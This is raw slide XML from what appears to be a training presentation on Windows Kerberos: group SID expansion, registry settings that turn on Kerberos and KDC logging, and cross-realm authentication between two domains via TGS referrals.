              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Global and Universal groups (direct and nested) SIDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Global and Universal groups’ SID History (direct and nested) SIDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TGS stage expansion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Domain local groups SIDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Domain local groups SID History</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Special SIDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local SAM stage expansion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Machine local groups SIDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>More Special SIDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Group Scopes explained: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limitations and common registry settings</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296366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261335"/>
            <a:ext cx="7924800" cy="4708981"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[HKLM\SYSTEM\CurrentControlSet\Control\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Lsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Kerberos\Parameters]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1"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LogLevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"=dword:1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Kerberos trace in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>windir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>%\system32\lsass.log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>See event entries in the System EventLog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>KDC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[HKLM\SYSTEM\CurrentControlSet\Services\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Kdc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1"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LogLevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"=dword:1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>See event entries in the System EventLog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limitations and common registry settings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Troubleshooting: Logging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136962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dirty="0"/>
              <a:t>Cross Realm Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Subtitle 1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2954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a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to get a ticket for a foreign machine?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="1384995"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Successful authentication in the local domain West</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to access a resource in domain East so the client needs to get a TGS from East</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client does not have a TGT for East, just for West</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Realm Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="Group 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="683568" y="3296073"/>
            <a:ext cx="2635104" cy="3011285"/>
            <a:chOff x="683568" y="3163599"/>
            <a:chExt cx="2635104" cy="3011285"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Isosceles Triangle 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="683568" y="3163599"/>
              <a:ext cx="2635104" cy="2785681"/>
            </a:xfrm>
            <a:prstGeom prst="triangle">
              <a:avLst/>
            </a:prstGeom>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wrap="none" rtlCol="0" anchor="b" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" dirty="0"/>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5434" y="5335825"/>
              <a:ext cx="566691" cy="526075"/>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6887" y="4283795"/>
              <a:ext cx="567174" cy="741510"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="TextBox 35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="683568" y="5959440"/>
              <a:ext cx="2635104" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>West</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="Group 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5652120" y="3315098"/>
            <a:ext cx="2635104" cy="2994222"/>
            <a:chOff x="5652120" y="3182624"/>
            <a:chExt cx="2635104" cy="2994222"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Isosceles Triangle 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5652120" y="3182624"/>
              <a:ext cx="2635104" cy="2785681"/>
            </a:xfrm>
            <a:prstGeom prst="triangle">
              <a:avLst/>
            </a:prstGeom>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wrap="none" rtlCol="0" anchor="b" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>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5689" y="4069266"/>
              <a:ext cx="627966" cy="741510"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>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4288" y="5074106"/>
              <a:ext cx="499308" cy="685686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="TextBox 40"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5652120" y="5961402"/>
              <a:ext cx="2635104" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>East</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="42" name="Elbow Connector 41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1822939" y="5230473"/>
            <a:ext cx="548699" cy="500863"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -2078"/>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43" name="TextBox 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972051" y="5633774"/>
            <a:ext cx="1275734" cy="215444"/>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r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>1. AS Exchange</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45" name="Straight Arrow Connector 44"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3037380" y="4751749"/>
            <a:ext cx="3402980" cy="932141"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:prstDash val="dash"/>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="TextBox 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3769925" y="5174522"/>
            <a:ext cx="1410579" cy="215444"/>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r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>2. TGS Exchange</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Picture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2430" y="2787168"/>
            <a:ext cx="1265931" cy="1265931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83443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left)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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down)">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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>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3" grpId="0" animBg="1"/>
      <p:bldP spid="4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430" y="2787168"/>
            <a:ext cx="1265931" cy="1265931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to get a ticket for a foreign machine?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="1769715"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A KDC can only issue tickets for its realm (or domain) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a client asks for a ticket for a different realm it issues a TGS referral</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The TGS is marked as a referral</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The KDC sends a normal TGS reply that contains a TGT for the KDC in trusted realm, encrypted with the inter-realm key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Realm Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Left-Right Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3232350" y="4386767"/>
            <a:ext cx="2664296" cy="288032"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none" tIns="216000" bIns="540000" rtlCol="0" anchor="b" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shared Inter-Realm Key</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="683568" y="3296073"/>
            <a:ext cx="2635104" cy="3011285"/>
            <a:chOff x="683568" y="3163599"/>
            <a:chExt cx="2635104" cy="3011285"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Isosceles Triangle 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="683568" y="3163599"/>
              <a:ext cx="2635104" cy="2785681"/>
            </a:xfrm>
            <a:prstGeom prst="triangle">
              <a:avLst/>
            </a:prstGeom>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wrap="none" rtlCol="0" anchor="b" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" dirty="0"/>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5434" y="5335825"/>
              <a:ext cx="566691" cy="526075"/>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76887" y="4283795"/>
              <a:ext cx="567174" cy="741510"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="TextBox 30"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="683568" y="5959440"/>
              <a:ext cx="2635104" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>West</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="Group 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5652120" y="3315098"/>
            <a:ext cx="2635104" cy="2994222"/>
            <a:chOff x="5652120" y="3182624"/>
            <a:chExt cx="2635104" cy="2994222"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Isosceles Triangle 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5652120" y="3182624"/>
              <a:ext cx="2635104" cy="2785681"/>
            </a:xfrm>
            <a:prstGeom prst="triangle">
              <a:avLst/>
            </a:prstGeom>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wrap="none" rtlCol="0" anchor="b" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>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55689" y="4069266"/>
              <a:ext cx="627966" cy="741510"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>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4288" y="5074106"/>
              <a:ext cx="499308" cy="685686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="TextBox 35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5652120" y="5961402"/>
              <a:ext cx="2635104" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>East</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37" name="Elbow Connector 36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1822939" y="5230473"/>
            <a:ext cx="548699" cy="500863"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -2078"/>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38" name="TextBox 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972051" y="5633774"/>
            <a:ext cx="1275734" cy="215444"/>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r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>1. AS Exchange</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45" name="Straight Arrow Connector 44"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3037380" y="4751749"/>
            <a:ext cx="3402980" cy="932141"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:prstDash val="dash"/>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxn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23811" y="2917977"/>
            <a:ext cx="1081374" cy="1070926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41" name="Straight Arrow Connector 40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3095566" y="5520908"/>
            <a:ext cx="3838850" cy="320733"/>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42" name="TextBox 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3803806" y="5616037"/>
            <a:ext cx="1272464" cy="215444"/>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r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
